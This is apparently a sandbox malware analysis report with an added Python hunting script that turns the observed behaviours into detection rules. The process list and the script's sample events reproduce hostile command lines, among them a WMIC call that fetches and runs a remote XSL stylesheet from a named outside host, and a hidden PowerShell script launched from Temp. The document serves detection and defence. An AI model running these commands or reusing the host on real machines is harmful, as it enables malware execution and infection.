Analysis

  • max time kernel
    119s
  • max time network
    122s
  • resource
    win7v191014

General

  • Target

    Supergevaarlijkk.zip

  • Sample

    191029-7v9yqqxm3n

  • SHA256

    6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score
N/A

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Executes dropped EXE 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Volume Shadow Copy WMI provider 1 IoCs
  • Uses Volume Shadow Copy Service COM API 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Drops file in system dir 23 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    • Suspicious use of AdjustPrivilegeToken
    • Discovering connected drives
    • Suspicious use of FindShellTrayWindow
    PID:1272
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in system dir
    PID:1100
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding 243205DFA88924D453B6AAC7C0F827FC
    • Suspicious use of WriteProcessMemory
    PID:1956
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1232
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1499776792-45809992719698239551625986655-21409207021220800572-4155067481224807039"
    • Suspicious use of SetWindowsHookEx
    PID:2012
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding A08CF5A0596379471CA5A4C2548E8A85
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    PID:2008
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    • Suspicious use of WriteProcessMemory
    • Uses Task Scheduler COM API
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Uses Volume Shadow Copy WMI provider
    • Uses Volume Shadow Copy Service COM API
    • Drops file in system dir
    PID:2068
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1126513327689161689607036660-26899110113909474221517395570954724345-1387271848"
    • Suspicious use of SetWindowsHookEx
    PID:2096
  • C:\Users\Admin\AppData\Local\Temp\lc8B1F.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc8B1F.tmp"
    • Executes dropped EXE
    PID:2196
  • C:\Users\Admin\AppData\Roaming\wEdauVc\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\wEdauVc\nvsmartmaxapp.exe"
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2460
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2480
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {79C46DA5-25DB-4866-8858-337DEC9C8038} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    • Suspicious use of WriteProcessMemory
    PID:2812
  • C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe
    C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2844
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    • Loads dropped DLL
    PID:2868
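The process list above carries the whole chain a hunter would want to alert on: msiexec installing a package from the user's Temp folder, WMIC fetching a remote XSL stylesheet via /format: (the `^,` is cmd.exe escaping a literal comma; the stylesheet URL is what matters), a hidden PowerShell running a script from Temp, and executables in AppData\Roaming run after taskeng.exe starts. The Python below is an added example, not part of the sandbox report or its tooling: it expresses those behaviours as rules over Sysmon Event ID 1-style records. The sample events are constructed from the command lines in the report; the ParentImage values are assumptions (the report lists processes flat), as are the ATT&CK technique labels attached to each rule.

```python
"""Process-creation hunting rules for the behaviours listed in this report.

Events are dicts shaped like Sysmon Event ID 1: ProcessId, Image, CommandLine,
ParentImage. Everything here is an added example; the ParentImage values in
SAMPLE_EVENTS are assumed, not taken from the report.
"""
import re

# Paths any unprivileged user can write to; dropped payloads landed here.
USER_WRITABLE = re.compile(r"\\appdata\\(local\\temp|roaming)\\", re.I)


def _image(e):
    return e["Image"].lower()


def _cmd(e):
    return e["CommandLine"].lower()


def _parent(e):
    return e.get("ParentImage", "").lower()


def wmic_remote_xsl(e):
    # WMIC /format: pointed at a URL downloads an XSL stylesheet and executes
    # the script it embeds (ATT&CK T1220, XSL Script Processing).
    return _image(e).endswith("\\wmic.exe") and \
        re.search(r'/format:"?https?://', _cmd(e)) is not None


def msiexec_temp_install(e):
    # msiexec /I installing a package from a user-writable directory.
    c = _cmd(e)
    return bool(_image(e).endswith("\\msiexec.exe")
                and re.search(r"\s/i\s", c)
                and USER_WRITABLE.search(c))


def powershell_hidden_script(e):
    # Hidden-window PowerShell executing a script file dropped under the profile.
    c = _cmd(e)
    return bool(_image(e).endswith("\\powershell.exe")
                and "-windowstyle hidden" in c
                and "-file" in c
                and USER_WRITABLE.search(c))


def dropped_exe_in_user_dir(e):
    # Any process whose image lives in Temp or Roaming, i.e. a dropped binary.
    return USER_WRITABLE.search(_image(e)) is not None


def scheduled_task_launch_from_user_dir(e):
    # taskeng.exe is the Task Scheduler engine on Windows 7; a dropped binary
    # started by it means the task-based persistence already fired.
    return _parent(e).endswith("\\taskeng.exe") and dropped_exe_in_user_dir(e)


# (rule name, ATT&CK technique as annotated here, predicate)
RULES = [
    ("wmic_remote_xsl", "T1220", wmic_remote_xsl),
    ("msiexec_temp_install", "T1218.007", msiexec_temp_install),
    ("powershell_hidden_script", "T1059.001", powershell_hidden_script),
    ("dropped_exe_in_user_dir", "T1204.002", dropped_exe_in_user_dir),
    ("scheduled_task_launch_from_user_dir", "T1053.005",
     scheduled_task_launch_from_user_dir),
]


def evaluate(events):
    """Return {ProcessId: [(rule, technique), ...]} for every event that fires."""
    hits = {}
    for e in events:
        for name, technique, check in RULES:
            if check(e):
                hits.setdefault(e["ProcessId"], []).append((name, technique))
    return hits


# Constructed from the report's command lines; ParentImage values are assumed.
SAMPLE_EVENTS = [
    {"ProcessId": 1272, "Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r"msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 1232, "Image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "CommandLine": r'"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"',
     "ParentImage": r"C:\Windows\syswow64\MsiExec.exe"},
    {"ProcessId": 2068, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden',
     "ParentImage": r"C:\Windows\syswow64\MsiExec.exe"},
    {"ProcessId": 2844, "Image": r"C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe",
     "CommandLine": r"C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe",
     "ParentImage": r"C:\Windows\system32\taskeng.exe"},
    # Benign control: an ordinary local WMIC query must not fire any rule.
    {"ProcessId": 4000, "Image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "CommandLine": r"wmic os get caption",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for pid, rules in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(f"{n} ({t})" for n, t in rules))
```

The rules match on lower-cased image suffixes and command-line substrings rather than exact paths, so they also catch renamed copies of the payload directory or a different Temp file name; the benign control event shows that a plain local WMIC query stays silent.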

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1100-13-0x0000000000B10000-0x0000000000B14000-memory.dmp (Filesize 16KB)
  • memory/1100-14-0x0000000002040000-0x0000000002044000-memory.dmp (Filesize 16KB)
  • memory/1100-16-0x0000000000B10000-0x0000000000B14000-memory.dmp (Filesize 16KB)
  • memory/1100-12-0x0000000000B10000-0x0000000000B14000-memory.dmp (Filesize 16KB)
  • memory/1100-17-0x0000000002040000-0x0000000002044000-memory.dmp (Filesize 16KB)
  • memory/1100-11-0x0000000000F50000-0x0000000000F54000-memory.dmp (Filesize 16KB)
  • memory/1272-19-0x0000000002310000-0x0000000002314000-memory.dmp (Filesize 16KB)
  • memory/1272-0-0x0000000004180000-0x0000000004184000-memory.dmp (Filesize 16KB)
  • memory/1272-18-0x0000000004180000-0x0000000004184000-memory.dmp (Filesize 16KB)
  • memory/2068-21-0x000000001C3C0000-0x000000001C3C4000-memory.dmp (Filesize 16KB)
  • memory/2068-22-0x000000001C3C0000-0x000000001C3C4000-memory.dmp (Filesize 16KB)
  • memory/2480-30-0x0000000003680000-0x0000000003691000-memory.dmp (Filesize 68KB)
  • memory/2480-29-0x0000000003270000-0x0000000003281000-memory.dmp (Filesize 68KB)
  • memory/2480-26-0x0000000000080000-0x0000000000081000-memory.dmp (Filesize 4KB)